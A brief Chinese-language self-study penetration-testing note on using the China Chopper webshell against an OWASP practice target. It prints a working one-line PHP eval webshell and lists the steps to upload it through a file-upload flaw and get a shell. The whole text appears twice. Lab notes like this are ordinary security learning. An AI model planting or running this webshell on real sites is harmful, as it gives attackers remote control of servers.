自学渗透第四天–中国菜刀
一、如何使用
中国菜刀的使用可利用网站的文件上传漏洞,通过一句话木马“<?php @eval($_POST['caidao']);?>”获取网站shell。本笔记使用的靶机是owasp。
(1)首先将一句话木马上传至网站后台。
(2)运行该文件,确认文件上传成功。
(3)复制该链接到中国菜刀,并输入相应的密码。
(4)成功获取网站shell。
二、常用功能
1、上传本地文件到网站后台。
自学渗透第四天–中国菜刀
一、如何使用
中国菜刀的使用可利用网站的文件上传漏洞,通过一句话木马“<?php @eval($_POST['caidao']);?>”获取网站shell。本笔记使用的靶机是owasp。
(1)首先将一句话木马上传至网站后台。
(2)运行该文件,确认文件上传成功。
(3)复制该链接到中国菜刀,并输入相应的密码。
(4)成功获取网站shell。
二、常用功能
1、上传本地文件到网站后台。